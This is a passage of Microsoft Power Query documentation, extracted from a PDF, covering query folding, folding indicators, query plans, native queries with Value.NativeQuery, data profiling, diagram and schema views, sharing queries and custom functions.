Next, select the table contextual menu and choose the Keep top rows transform.
In Keep top rows, enter the value 10, and then select OK.
The following code sample is the full M script for the query you created:
Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Descending}}),
#"Kept top rows" = Table.FirstN(#"Sorted rows", 10)
in
#"Kept top rows"
You can right-click the last step of your query, the one named Kept top rows, and select
the option that reads Query plan.
To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node. This request is in the native language of your data source. For
this case, that language is SQL, and this statement represents a request for only the
TOP 10 rows, with only the requested fields from the fact_Sale table after it has been
sorted in descending order by the Sale Key field.
Consulting this data source query can help you better understand the story that the full
query plan tries to convey:
7 Note
While there's no clause that can be used to SELECT the bottom rows of a table in
the T-SQL language, there's a TOP clause that retrieves the top rows of a table.
For its evaluation, this query only downloads 10 rows, with only the fields that you
requested from the fact_Sale table. This query took an average of 31 seconds to be
processed in a standard instance of Power BI dataflows (which accounts for the
evaluation and loading of data to dataflows).
Performance comparison
To better understand the effect that query folding has on these queries, you can refresh
your queries, record the time it takes to fully refresh each query, and compare them. For
simplicity, this article provides the average refresh timings captured using the Power BI
dataflows refresh mechanic while connecting to a dedicated Azure Synapse Analytics
environment with DW2000c as the service level.
It's often the case that a query that fully folds back to the data source outperforms
similar queries that don't completely fold back to the data source. There could be many
reasons why this is the case. These reasons range from the complexity of the transforms
that your query performs, to the query optimizations implemented at your data source,
such as indexes and dedicated computing, and network resources. Still, query folding
tries to minimize the effect that two specific processes have in Power Query:
Data in transit
Transforms executed by the Power Query engine
The following sections explain the effect that these two processes have on the previously
mentioned queries.
Data in transit
When a query gets executed, it tries to fetch the data from the data source as one of its
first steps. What data is fetched from the data source is defined by the query folding
mechanism. This mechanism identifies the steps from the query that can be offloaded to
the data source.
The following table lists the number of rows requested from the fact_Sale table of the
database. The table also includes a brief description of the SQL statement sent to
request such data from the data source.
No query folding: 3,644,356 rows requested. The request is for all fields and all records
from the fact_Sale table.
Partial query folding: 3,644,356 rows requested. The request is for all records, but only
the required fields from the fact_Sale table after it was sorted by the Sale Key field.
Full query folding: 10 rows requested. The request is for only the required fields and the
TOP 10 records of the fact_Sale table after being sorted in descending order by the
Sale Key field.
When requesting data from a data source, the data source needs to compute the results
for the request and then send the data to the requestor. Beyond those computing
resources, the network cost of moving the data from the data source to Power Query,
and then having Power Query receive the data and prepare it for the transforms that
happen locally, can take some time depending on the size of the data.
For the showcased examples, Power Query had to request over 3.6 million rows from the
data source for the no query folding and partial query folding examples. For the full
query folding example, it only requested 10 rows. For the fields requested, the no query
folding example requested all the available fields from the table. Both the partial query
folding and the full query folding examples only submitted a request for exactly the
fields that they needed.
The following table showcases the nodes from the query plans of the previous queries
that would have been evaluated by the Power Query engine.
For the examples showcased in this article, the full query folding example doesn't
require any transforms to happen inside the Power Query engine as the required output
table comes directly from the data source. In contrast, the other two queries required
some computation to happen at the Power Query engine. Because of the amount of
data that needs to be processed by these two queries, the process for these examples
takes more time than the full query folding example.
The following list describes each type of operator:
Remote: Operators that are data source nodes. The evaluation of these operators occurs
outside of Power Query.
Streaming: Pass-through operators. For example, Table.SelectRows with a simple filter
can usually filter the results as they pass through the operator, and doesn't need to
gather all rows before moving the data. Table.SelectColumns and Table.ReorderColumns
are other examples of this sort of operator.
Full scan: Operators that need to gather all the rows before the data can move on to the
next operator in the chain. For example, to sort data, Power Query needs to gather all the
data. Other examples of full scan operators are Table.Group , Table.NestedJoin , and
Table.Pivot .
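As an illustrative sketch (not from this article), the following query contrasts a streaming
operator with a full scan operator; the inline table and its column names are assumptions
standing in for fact_Sale.
Power Query M
let
    // Small stand-in table for fact_Sale
    Source = Table.FromRecords({
        [#"Sale Key" = 2, Quantity = 5],
        [#"Sale Key" = 1, Quantity = 0]
    }),
    // Streaming: rows can pass through the filter as they're read
    #"Filtered rows" = Table.SelectRows(Source, each [Quantity] > 0),
    // Full scan: all rows must be gathered before the sort can produce output
    #"Sorted rows" = Table.Sort(#"Filtered rows", {{"Sale Key", Order.Ascending}})
in
    #"Sorted rows"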
Tip
While not every transform is the same from a performance standpoint, in most
cases, having fewer transforms is usually better.
Query folding indicators
7 Note
Before reading this article, we recommend that you read Overview of query
evaluation and query folding in Power Query to better understand how folding
works in Power Query.
Query folding indicators help you understand the steps that fold or don't fold.
With query folding indicators, it becomes obvious when you make a change that breaks
folding. This feature helps you to more easily resolve issues quickly, avoid performance
issues in the first place, and have better insight into your queries. In most cases you run
into, steps will fold or won't fold. But there are many cases where the outcome isn't as
obvious, and these cases are discussed in Step diagnostics indicators (Dynamic, Opaque,
and Unknown).
7 Note
The query folding indicators feature is available only for Power Query Online.
The folding state shown by an indicator applies to the query up to and including that
step, not just to the step itself. This interpretation works even with a simple query
against a SQL source. For example,
using the AdventureWorks sample database, connect to the Production.Product table
and load data. Loading this sample through the Power Query navigator gives the
following query:
Power Query M
let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data]
in
Navigation
If you examine how this code shows up in query folding indicators, you'll note that the
first step is inconclusive. But the second step does fold, which means that the query up
to that point does fold.
In this example, the initial steps can't be confirmed to fold (they're inconclusive), but the
final step generated when you load data initially does fold. How the first steps (Source, and
sometimes other Navigation steps) are handled depends on the connector. With SQL,
for example, it's handled as a catalog table value, which doesn't fold. However, as soon
as you select data for that connector, it will fold.
Conversely, this can also mean that your query folds up to a point and then stops
folding. Unlike in the case where you have a folding indicator for the step that shows
that everything folds, when you have a not-folding indicator it doesn't mean that
everything doesn't fold. Instead, it means that "not everything" folds. Generally,
everything up to the last folding indicator will fold, with more operations happening
after.
Modifying the example from above, you can give a transform that never folds—
Capitalize Each Word.
Power Query M
let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data],
#"Capitalized each word" = Table.TransformColumns(Navigation, {{"Name",
each Text.Proper(_), type text}})
in
#"Capitalized each word"
In the query folding indicators, you have the same indicators as above, except the final
step doesn't fold. Everything up to this final step will be performed on the data source,
while the final step will be performed locally.
Step diagnostics indicators
Query folding indicators use an underlying query plan, and require it to be able to get
information about the query to report it. Currently the query plan only supports tables,
so some cases (lists, records, primitives) won't report as folding or not. Similarly,
constant tables report as opaque.
Folding: The folding indicator tells you that the query up to this step will be evaluated by
the data source.
Not folding: The not-folding indicator tells you that some part of the query up to this
step will be evaluated outside the data source. You can compare it with the last folding
indicator, if there is one, to see if you can rearrange your query to be more performant.
Might fold: Might fold indicators are uncommon. They mean that a query "might" fold.
They indicate either that folding or not folding will be determined at runtime, when
pulling results from the query, and that the query plan is dynamic. These indicators will
likely only appear with ODBC or OData connections.
Opaque: Opaque indicators tell you that the resulting query plan is inconclusive for some
reason. It generally indicates that there's a true "constant" table, or that the transform or
connector isn't supported by the indicators and query plan tool.
Example analysis
For an example analysis, start by connecting to the Production.Product table in
Adventure Works (SQL). The initial load, similar to the example above, looks like the
following image.
Adding more steps that fold will extend that green line on the right side. This extension
occurs because this step also folds.
Adding a step that doesn't fold displays a different indicator. For example, Capitalize
each word never folds. The indicator changes, showing that as of this step, it's stopped
folding. As mentioned earlier, the previous steps will still fold.
Adding more steps downstream that depend on Capitalize each word will continue to
not fold.
However, if you remove the column you applied the capitalization to so that the
optimized query plan can all fold once more, you'll get a result like the following image.
However, something like this is uncommon. This image illustrates how it's not just the
order of steps, but the actual transformations that apply as well.
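Building on the earlier script, a hedged sketch of that situation might look like the
following, where removing the Name column lets the optimized plan drop the non-folding
transform; the final step name is an assumption.
Power Query M
let
    Source = Sql.Database("ServerName", "AdventureWorks"),
    Navigation = Source{[Schema = "Production", Item = "Product"]}[Data],
    #"Capitalized each word" = Table.TransformColumns(Navigation, {{"Name",
        each Text.Proper(_), type text}}),
    // Removing the capitalized column means its non-folding transform is no longer
    // needed for the output, so the whole query can fold once more
    #"Removed columns" = Table.RemoveColumns(#"Capitalized each word", {"Name"})
in
    #"Removed columns"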
Query plan for Power Query (Preview)
Article • 02/17/2023
Query plan for Power Query is a feature that provides a better view of your query's
evaluation. It's useful to help determine why a particular query might not fold at a
particular step.
Through a practical example, this article will demonstrate the main use case and
potential benefits of using the query plan feature to review your query steps. The
examples used in this article have been created using the AdventureWorksLT sample
database for Azure SQL Server, which you can download from AdventureWorks sample
databases.
7 Note
The query plan feature for Power Query is only available in Power Query Online.
This article has been divided into a series of recommended steps for interpreting the
query plan. These steps are:
1. Review the query folding indicators.
2. Select the query step to review its query plan.
3. Implement changes to your query.
Use the following steps to create the query in your own Power Query Online
environment.
Power Query M
let
Source = Sql.Database("servername", "database"),
Navigation = Source{[Schema = "Sales", Item = "SalesOrderHeader"]}
[Data],
#"Removed other columns" = Table.SelectColumns(Navigation,
{"SalesOrderID", "OrderDate", "SalesOrderNumber",
"PurchaseOrderNumber", "AccountNumber", "CustomerID", "TotalDue"}),
#"Filtered rows" = Table.SelectRows(#"Removed other columns", each
[TotalDue] > 1000),
#"Kept bottom rows" = Table.LastN(#"Filtered rows", 5)
in
#"Kept bottom rows"
3. Change servername and database with the correct names for your own
environment.
5. Select Next.
6. In the Power Query Editor, select Configure connection and provide the
credentials to your data source.
After following these steps, your query will look like the one in the following image.
This query connects to the SalesOrderHeader table, and selects a few columns from the
last five orders with a TotalDue value above 1000.
7 Note
This article uses a simplified example to showcase this feature, but the concepts
described in this article apply to all queries. We recommend that you have a good
knowledge of query folding before reading the query plan. To learn more about
query folding, go to Query folding basics.
7 Note
Before reading this section, we recommend that you review the article on Query
folding indicators.
Your first step in this process is to review your query and pay close attention to the
query folding indicators. The goal is to review the steps that are marked as not folded.
Then you can see if making changes to the overall query could make those
transformations fold completely.
For this example, the only step that can't be folded is Kept bottom rows, which is easy
to identify through the not folded step indicator. This step is also the last step of the
query.
The goal now is to review this step and understand what's being folded back to the data
source and what can't be folded.
Power Query tries to optimize your query by taking advantage of lazy evaluation and
query folding, as mentioned in Query folding basics. This query plan represents the
optimized translation of your M query into the native query that's sent to the data
source. It also includes any transforms that are performed by the Power Query Engine.
The order in which the nodes appear follows the order of your query starting from the
last step or output of your query, which is represented on the far left of the diagram and
in this case is the Table.LastN node that represents the Kept bottom rows step.
At the bottom of the dialog, there's a bar with icons that help you zoom in or out of the
query plan view, and other buttons to help you manage the view. For the previous
image, the Fit to view option from this bar was used to better appreciate the nodes.
7 Note
The query plan represents the optimized plan. When the engine is evaluating a
query, it tries to fold all operators into a data source. In some cases, it might even
do some internal reordering of the steps to maximize folding. With this in mind, the
nodes/operators left in this optimized query plan typically contain the "folded" data
source query and any operators that couldn't be folded and are evaluated locally.
Folded nodes: These nodes can be either Value.NativeQuery or "data source" nodes
such as Sql.Database . They can also be identified with the label remote under their
function name.
Non-folded nodes: Other table operators, such as Table.SelectRows ,
Table.SelectColumns , and other functions that couldn't be folded. They can also be
identified with the Streaming or Full scan labels.
The following image shows the folded nodes inside the red rectangle. The rest of the
nodes couldn't be folded back to the data source. You'll need to review the rest of the
nodes since the goal is to attempt to have those nodes fold back to the data source.
You can select View details at the bottom of some nodes to display extended
information. For example, the details of the Value.NativeQuery node show the native
query (in SQL) that will be sent to the data source.
The query shown here might not be exactly the same query sent to the data source, but
it's a good approximation. For this case, it tells you exactly what columns will be queried
from the SalesOrderHeader table and then how it will filter that table using the TotalDue
field to only get rows where the value for that field is larger than 1000. The node next to
it, Table.LastN, is calculated locally by the Power Query engine, as it can't be folded.
7 Note
The operators might not exactly match the functions used in the query's script.
The goal is to apply changes to your query so that the step can be folded. Some of the
changes you might implement could range from rearranging your steps to applying an
alternative logic to your query that's more explicit to the data source. This doesn't mean
that all queries and all operations are foldable by applying some changes. But it's a
good practice to determine through trial and error if your query could be folded back.
Since the data source is a SQL Server database, if the goal is to retrieve the last five
orders from the table, then a good alternative would be to take advantage of the TOP
and ORDER BY clauses in SQL. Since there's no BOTTOM clause in SQL, the Table.LastN
transform in Power Query can't be translated into SQL. You could remove the
Table.LastN step and replace it with:
A sort descending step by the SalesOrderID column in the table, since this column
determines which order goes first and which has been entered last.
A Keep top rows step for five rows. Since the table has been sorted, this transform
accomplishes the same result as the original Kept bottom rows ( Table.LastN ) step.
This alternative is equivalent to the original query. While this alternative in theory seems
good, you need to make the changes to see if this alternative will make this node fully
fold back to the data source.
1. Close the query plan dialog and go back to the Power Query Editor.
2. Remove the Kept bottom rows step.
3. Sort the SalesOrderID column in descending order.
4. Select the table icon on the top-left corner of the data preview and select the
option that reads Keep top rows. In the dialog, enter five as the argument, and then
select OK.
After implementing the changes, check the query folding indicators again and see if it's
giving you a folded indicator.
Now it's time to review the query plan of the last step, which is now Keep top rows.
Now there are only folded nodes. Select View details under Value.NativeQuery to verify
which query is being sent to the database.
While this article is suggesting what alternative to apply, the main goal is for you to
learn how to use the query plan to investigate query folding. This article also provides
visibility of what's being sent to your data source and what transforms will be done
locally.
You can adjust your code to see the impact that it has in your query. By using the query
folding indicators, you'll also have a better idea of which steps are preventing your
query from folding.
Query folding on native queries
Article • 02/17/2023
In Power Query, you're able to define a native query and run it against your data source.
The Import data from a database using native database query article explains how to do
this process with multiple data sources. But, by using the process described in that
article, your query won't take advantage of any query folding from subsequent query
steps.
This article showcases an alternative method to create native queries against your data
source using the Value.NativeQuery function and keep the query folding mechanism
active for subsequent steps of your query.
7 Note
We recommend that you read the documentation on query folding and the query
folding indicators to better understand the concepts used throughout this article.
The following connectors currently support query folding over native queries:
Amazon Redshift
Dataverse (when using enhanced compute)
Google BigQuery
PostgreSQL
SAP HANA
Snowflake
SQL Server
7 Note
To showcase this process, this article uses the SQL Server connector and the
AdventureWorks2019 sample database. The experience may vary from connector
to connector, but this article showcases the fundamentals on how to enable query
folding capabilities over native queries for the supported connectors.
When connecting to the data source, it's important that you connect to the node or
level where you want to execute your native query. For the example in this article, that
node will be the database level inside the server.
After defining the connection settings and supplying the credentials for your
connection, you'll be taken to the navigation dialog for your data source. In that dialog,
you'll see all the available objects that you can connect to.
From this list, you need to select the object where the native query is run (also known as
the target). For this example, that object is the database level.
In the Power Query navigator window, right-click the database node and select the
Transform Data option. Selecting this option creates a new query
of the overall view of your database, which is the target you need to run your native
query.
Once your query lands in the Power Query editor, only the Source step should show in
the Applied steps pane. This step contains a table with all the available objects in your
database, similar to how they were displayed in the Navigator window.
The first step was to define the correct target, which in this case is the database where
the SQL code will be run. Once a step has the correct target, you can select that step—in
this case, Source in Applied Steps—and then select the fx button in the formula bar to
add a custom step. In this example, replace the Source formula with the following
formula:
Power Query M
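(The original formula isn't reproduced here; the following is a hedged sketch assuming
an illustrative SQL statement against the AdventureWorks2019 HumanResources.Department
table, chosen so that it returns a small table such as the three-row, two-column result
described below.)
Value.NativeQuery(
    Source,
    "SELECT DepartmentID, Name FROM HumanResources.Department WHERE GroupName = 'Research and Development'",
    null,
    // The options record in the fourth parameter keeps query folding active
    [EnableFolding = true]
)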
The most important component of this formula is the use of the optional record for the
fourth parameter of the function, which has the EnableFolding record field set to true.
7 Note
You can read more about the Value.NativeQuery function from the official
documentation article.
After you enter the formula, a warning appears that requires you to enable native
queries to run for your specific step. Select Continue for this step to be evaluated.
This SQL statement yields a table with only three rows and two columns.
Test query folding
To test the query folding of your query, you can try to apply a filter to any of your
columns and see if the query folding indicator in the applied steps section shows the
step as folded. For this case, you can filter the DepartmentID column to have values that
are not equal to two.
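A minimal sketch of the step this filter adds might look like the following; the name of
the preceding step ( Run native query ) is an assumption.
Power Query M
#"Filtered rows" = Table.SelectRows(#"Run native query", each [DepartmentID] <> 2)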
After adding this filter, you can check that the query folding indicators still show the
query folding happening at this new step.
To further validate what query is being sent to the data source, you can right-click the
Filtered rows step and select the option that reads View query plan to check the query
plan for that step.
In the query plan view, you can see a node named Value.NativeQuery at the left side of
the screen that has hyperlink text that reads View details. Select this hyperlink to view
the exact query that is being sent to the SQL Server database.
The native query is wrapped around another SELECT statement to create a subquery of
the original. Power Query will do its best to create the most optimal query given the
transforms used and the native query provided.
Tip
For scenarios where you get errors because query folding wasn't possible, it is
recommended that you try validating your steps as a subquery of your original
native query to check if there might be any syntax or context conflicts.
Using the data profiling tools
Article • 08/14/2023
The data profiling tools provide new and intuitive ways to clean, transform, and
understand data in Power Query Editor. They include:
Column quality
Column distribution
Column profile
To enable the data profiling tools, go to the View tab on the ribbon. In Power Query
Desktop, enable the options you want in the Data preview group, as shown in the
following image.
In Power Query Online, select Data view, then enable the options you want in the drop-
down list.
After you enable the options, you'll see something like the following image in Power
Query Editor.
7 Note
By default, Power Query performs this data profiling over the first 1,000 rows of
your data. To have it operate over the entire dataset, select the Column profiling
based on top 1000 rows message in the lower-left corner of your editor window to
change column profiling to Column profiling based on entire dataset.
Column quality
The column quality feature labels values in rows in five categories:
Valid, shown in green.
Error, shown in red.
Empty, shown in dark grey.
Unknown, shown in dashed green. Indicates when there are errors in a column, the
quality of the remaining data is unknown.
These indicators are displayed directly underneath the name of the column as part of a
small bar chart, as shown in the following image.
The number of records in each column quality category is also displayed as a
percentage.
By hovering over any of the columns, you are presented with the numerical distribution
of the quality of values throughout the column. Additionally, selecting the ellipsis button
(...) opens some quick action buttons for operations on the values.
Column distribution
This feature provides a set of visuals underneath the names of the columns that
showcase the frequency and distribution of the values in each of the columns. The data
in these visualizations is sorted in descending order from the value with the highest
frequency.
By hovering over the distribution data in any of the columns, you get information about
the overall data in the column (with distinct count and unique values). You can also
select the ellipsis button and choose from a menu of available operations.
Column profile
This feature provides a more in-depth look at the data in a column. Apart from the
column distribution chart, it contains a column statistics chart. This information is
displayed underneath the data preview section, as shown in the following image.
Filter by value
You can interact with the value distribution chart on the right side and select any of the
bars by hovering over the parts of the chart.
Copy data
In the upper-right corner of both the column statistics and value distribution sections,
you can select the ellipsis button (...) to display a Copy shortcut menu. Select it to copy
the data displayed in either section to the clipboard.
Group by value
When you select the ellipsis button (...) in the upper-right corner of the value
distribution chart, in addition to Copy you can select Group by. This feature groups the
values in your chart by a set of available options.
The image below shows a column of product names that have been grouped by text
length. After the values have been grouped in the chart, you can interact with individual
values in the chart as described in Filter by value.
Using the Queries pane
Article • 02/17/2023
In Power Query, you'll be creating many different queries. Whether you're getting data
from many tables or duplicating the original query, the number of queries will increase.
7 Note
Some actions in the Power Query Online editor may be different than actions in the
Power Query Desktop editor. These differences will be noted in this article.
Rename a query
To directly change the name of the query, double-click the name of the query. This
action allows you to immediately change the name.
Alternatively, go to Query Settings and enter a different name in the Name input field.
Delete a query
To delete a query, open the context pane on the query and select Delete. There will be
an additional pop-up confirming the deletion. To complete the deletion, select the
Delete button.
Duplicating a query
Duplicating a query will create a copy of the query you're selecting.
To duplicate your query, open the context pane on the query and select Duplicate. A
new duplicate query will pop up on the side of the query pane.
Referencing a query
Referencing a query will create a new query. The new query uses the steps of a previous
query without having to duplicate the query. Additionally, any changes on the original
query will transfer down to the referenced query.
To reference your query, open the context pane on the query and select Reference. A
new referenced query will pop up on the side of the query pane.
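As a rough illustration, the M generated for a referenced query is simply a query whose source is the original query. In the following sketch, Sales Data is a hypothetical name for the original query.
Power Query M
let
    // The referenced query points at the original query by name;
    // any changes to the original flow through automatically.
    Source = #"Sales Data"
in
    Source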
7 Note
To learn more about how to copy and paste queries in Power Query, go to Sharing
a query.
To be comprehensive, the following sections once again describe all of the context
menu actions that are relevant in either experience.
New query
You can import data into the Power Query editor through the New query option in the
context menu. To learn about how to get data into Power Query, go to Getting data.
Merge queries
When you select the Merge queries option from the context menu, the Merge queries
input screen opens.
This option functions the same as the Merge queries feature located on the ribbon and
in other areas of the editor.
7 Note
To learn more about how to use the Merge queries feature, go to Merge queries
overview.
New parameter
When you select the New parameter option from the context menu, the New
parameter input screen opens.
This option functions the same as the New parameter feature located on the ribbon.
7 Note
To move the query into a group, open the context menu on the specific query.
Then, select the group you want to put the query in.
The move will look like the following image. Using the same steps as above, you can
also move the query out of the group by selecting Queries (root) or another group.
In desktop versions of Power Query, you can also drag and drop the queries into the
folders.
Diagram view
Article • 02/17/2023
Diagram view offers a visual way to prepare data in the Power Query editor. With this
interface, you can easily create queries and visualize the data preparation process.
Diagram view simplifies the experience of getting started with data wrangling. It speeds
up the data preparation process and helps you quickly understand the dataflow, both
the "big picture view" of how queries are related and the "detailed view" of the specific
data preparation steps in a query.
This feature is enabled by selecting Diagram view in the View tab on the ribbon. With
diagram view enabled, the steps pane and queries pane will be collapsed.
7 Note
Diagram view is also connected to the Data Preview and the ribbon so that you can
select columns in the Data Preview.
You can add a new step within a query, after the currently selected step, by selecting the
+ button, and then either search for the transform or choose the item from the shortcut
menu. These are the same transforms you'll find in the Power Query editor ribbon.
By searching and selecting the transform from the shortcut menu, the step gets added
to the query, as shown in the following image.
7 Note
To learn more about how to author queries in the Query editor using the Power
Query editor ribbon or data preview, go to Power Query Quickstart.
Query level actions
You can perform two quick actions on a query—expand/collapse a query and highlight
related queries. These quick actions show up on an active selected query or when
hovering over a query.
You can perform more query level actions such as duplicate, reference, and so on, by
selecting the query level context menu (the three vertical dots). You can also right-click
in the query and get to the same context menu.
Delete query
To delete a query, right-click in a query and select Delete from the context menu. There
will be an additional pop-up to confirm the deletion.
Rename query
To rename a query, right-click in a query and select Rename from the context menu.
Enable load
By default, Enable load is set to true so that the results provided by the query are
available for downstream use such as report building. If you need to disable load for a
given query, right-click the query and select Enable load. Queries where Enable load is
set to false are displayed with a grey outline.
Duplicate
To create a copy of a given query, right-click in the query and select Duplicate. A new
duplicate query will appear in the diagram view.
Reference
Referencing a query will create a new query. The new query will use the steps of the
previous query without having to duplicate the query. Additionally, any changes on the
original query will transfer down to the referenced query. To reference a query, right-
click in the query and select Reference.
Move to group
You can make folders and move the queries into these folders for organizational
purposes. These folders are called groups. To move a given query to a Query group,
right-click in a query and select Move to group. You can choose to move the queries to
an existing group or create a new query group.
You can view the query groups above the query box in the diagram view.
Create function
When you need to apply the same set of transformations in different queries or values,
creating custom Power Query functions can be valuable. To learn more about custom
functions, go to Using custom functions. To convert a query into a reusable function,
right-click in a given query and select Create function.
Convert to parameter
A parameter provides the flexibility to dynamically change the output of your queries
depending on their value and promotes reusability. To convert a non-structured value
such as date, text, number, and so on, right-click in the query and select Convert to
Parameter.
Advanced editor
With the advanced editor, you can see the code that Power Query editor is creating with
each step. To view the code for a given query, right-click in the query and select
Advanced editor.
7 Note
To learn more about the code used in the advanced editor, go to Power Query M
language specification.
7 Note
To learn more about how to merge queries in Power Query, go to Merge queries
overview.
Edit settings
To edit the step level settings, right-click the step and choose Edit settings.
Alternatively, you can double-click a step that has step settings to go directly to the
settings dialog box. In the settings dialog box, you can view or change the step level
settings. For example, the following image shows the settings dialog box for the Split
column step.
Rename step
To rename a step, right-click the step and select Rename. This action opens the Step
properties dialog. Enter the name you want, and then select OK.
Delete step
To delete a step, right-click the step and select Delete. To delete a series of steps until
the end, right-click the step and select Delete until end.
To add a step description, right-click the step and select Properties. This action opens a
dialog box where you can add the step description. This step description comes in handy
when you come back to the same query after a few days or when you share your queries
or dataflows with other users.
By hovering over each step, you can view a callout that shows the step label, step name,
and any step descriptions that were added.
By selecting each step, you can see the corresponding data preview for that step.
You can also expand or collapse a query by selecting the query level actions from the
query's context menu.
To expand all or collapse all queries, select the Expand all/Collapse all button next to
the layout options in the diagram view pane.
You can also right-click any empty space in the diagram view pane and see a context
menu to expand all or collapse all queries.
In the collapsed mode, you can quickly look at the steps in the query by hovering over
the number of steps in the query. You can select these steps to navigate to that specific
step within the query.
Layout Options
There are five layout options available in the diagram view: zoom out, zoom in, mini-
map, full screen, fit to view, and reset.
Zoom out/zoom in
With this option, you can adjust the zoom level and zoom out or zoom in to view all the
queries in the diagram view.
Mini-map
With this option, you can turn the diagram view mini-map on or off. More information:
Show mini-map
Full screen
With this option, you can view all the queries and their relationships through the Full
screen mode. The diagram view pane expands to full screen and the data preview pane,
queries pane, and steps pane remain collapsed.
Fit to view
With this option, you can adjust the zoom level so that all the queries and their
relationships can be fully viewed in the diagram view.
Reset
With this option, you can reset the zoom level back to 100% and also reset the pane to
the top-left corner.
Similarly, you can select the right dongle to view direct and indirect dependent queries.
You can also hover on the link icon below a step to view a callout that shows the query
relationships.
You can modify diagram view settings from the View tab on the ribbon. A second way to
modify them is to right-click over a blank part of the diagram view background.
You can change diagram view settings to show step names to match the applied steps
within the query settings pane.
Compact view
When you have queries with multiple steps, it can be challenging to scroll horizontally to
view all your steps within the viewport.
To address this, diagram view offers Compact view, which compresses the steps from
top to bottom instead of left to right. This view can be especially useful when you have
queries with multiple steps, so that you can see as many queries as possible within the
viewport.
To enable this view, navigate to diagram view settings and select Compact view inside
the View tab in the ribbon.
Show mini-map
Once the number of queries begins to overflow the diagram view, you can use the scroll
bars at the bottom and right side of the diagram view to scroll through the queries. One
other method of scrolling is to use the diagram view mini-map control. The mini-map
control lets you keep track of the overall dataflow "map", and quickly navigate, while
looking at a specific area of the map in the main diagram view area.
To open the mini-map, either select Show mini-map from the diagram view menu or
select the mini-map button in the layout options.
Select and hold the rectangle on the mini-map, then move the rectangle to move
around in the diagram view.
Show animations
When the Show animations menu item is selected, the transitions of the sizes and
positions of the queries are animated. These transitions are easiest to see when collapsing
or expanding the queries or when changing the dependencies of existing queries. When
cleared, the transitions will be immediate. Animations are turned on by default.
You can also expand or collapse related queries from the query level context menu.
Multi-select queries
You can select multiple queries within the diagram view by holding down the Ctrl key and
selecting queries. Once you multi-select, right-clicking shows a context menu that
allows you to perform operations such as merge, append, move to group, expand/collapse,
and more.
Inline rename
You can double-click the query name to rename the query.
Double-clicking the step name allows you to rename the step, provided the diagram
view setting is showing step names.
When step labels are displayed in diagram view, double-clicking the step label shows
the dialog box to rename the step name and provide a description.
Accessibility
Diagram view supports accessibility features such as keyboard navigation, high-contrast
mode, and screen reader support. The following table describes the keyboard shortcuts
that are available within diagram view. To learn more about keyboard shortcuts available
within Power Query Online, go to keyboard shortcuts in Power Query.
Action Keyboard shortcut
Move focus from query level to step level Alt+Down arrow key
Schema view
Schema view is designed to optimize your flow when working on schema level
operations by putting your query's column information front and center. Schema view
provides contextual interactions to shape your data structure, and lower latency
operations as it only requires the column metadata to be computed and not the
complete data results.
This article walks you through schema view and the capabilities it offers.
7 Note
The Schema view feature is available only for Power Query Online.
Overview
When working on data sets with many columns, simple tasks can become incredibly
cumbersome because even finding the right column by horizontally scrolling and
parsing through all the data is inefficient. Schema view displays your column
information in a list that's easy to parse and interact with, making it easier than ever to
work on your schema.
In addition to an optimized column management experience, another key benefit of
schema view is that transforms tend to yield results faster. These results are faster
because this view only requires the column information to be computed instead of a
preview of the data. So even long-running queries with a few columns will benefit from
using schema view.
You can turn on schema view by selecting Schema view in the View tab. When you're
ready to work on your data again, you can select Data view to go back.
Reordering columns
One common task when working on your schema is reordering columns. In Schema
View this can easily be done by dragging columns in the list and dropping in the right
location until you achieve the desired column order.
Applying transforms
For more advanced changes to your schema, you can find the most used column-level
transforms right at your fingertips directly in the list and in the Schema tools tab. Plus,
you can also use transforms available in other tabs on the ribbon.
Share a query
Article • 12/17/2022
You can use Power Query to extract and transform data from external data sources.
These extraction and transformation steps are represented as queries. Queries created
with Power Query are expressed using the M language and executed through the M
Engine.
You can easily share and reuse your queries across projects, and also across Power
Query product integrations. This article covers the general mechanisms to share a query
in Power Query.
Copy / Paste
In the queries pane, right-click the query you want to copy. From the dropdown menu,
select the Copy option. The query and its definition will be added to your clipboard.
7 Note
The copy feature is currently not available in Power Query Online instances.
To paste the query from your clipboard, go to the queries pane and right-click on any
empty space in it. From the menu, select Paste.
When pasting this query on an instance that already has the same query name, the
pasted query will have a suffix added with the format (#), where the pound sign is
replaced with a number to distinguish the pasted queries.
You can also paste queries between multiple instances and product integrations. For
example, you can copy the query from Power BI Desktop, as shown in the previous
images, and paste it in Power Query for Excel as shown in the following image.
2 Warning
Copying and pasting queries between product integrations doesn't guarantee that
all functions and functionality found in the pasted query will work on the
destination. Some functionality might only be available in the origin product
integration.
With the code of your query in your clipboard, you can share this query through the
means of your choice. The recipient of this code needs to create a blank query and
follow the same steps as described above. But instead of copying the code, the recipient
will replace the code found in their blank query with the code that you provided.
7 Note
To create a blank query, go to the Get Data window and select Blank query from
the options.
Using custom functions
If you find yourself in a situation where you need to apply the same set of
transformations to different queries or values, creating a Power Query custom function
that can be reused as many times as you need could be beneficial. A Power Query
custom function is a mapping from a set of input values to a single output value, and is
created from native M functions and operators.
While you can manually create your own Power Query custom function using code as
shown in Understanding Power Query M functions, the Power Query user interface
offers you features to speed up, simplify, and enhance the process of creating and
managing a custom function.
This article focuses on this experience, provided only through the Power Query user
interface, and how to get the most out of it.
) Important
This article outlines how to create a custom function with Power Query using
common transforms accessible in the Power Query user interface. It focuses on the
core concepts to create custom functions, and links to additional articles in Power
Query documentation for more information on specific transforms that are
referenced in this article.
7 Note
The following example was created using the desktop experience found in Power BI
Desktop and can also be followed using the Power Query experience found in Excel
for Windows.
You can follow along with this example by downloading the sample files used in this
article from the following download link. For simplicity, this article will be using the
Folder connector. To learn more about the Folder connector, go to Folder. The goal of
this example is to create a custom function that can be applied to all the files in that
folder before combining all of the data from all files into a single table.
Start by using the Folder connector experience to navigate to the folder where your files
are located and select Transform Data or Edit. This will take you to the Power Query
experience. Right-click on the Binary value of your choice from the Content field and
select the Add as New Query option. For this example, you'll see that the selection was
made for the first file from the list, which happens to be the file April 2019.csv.
This option will effectively create a new query with a navigation step directly to that file
as a Binary, and the name of this new query will be the file path of the selected file.
Rename this query to be Sample File.
Create a new parameter with the name File Parameter. Use the Sample File query as the
Current Value, as shown in the following image.
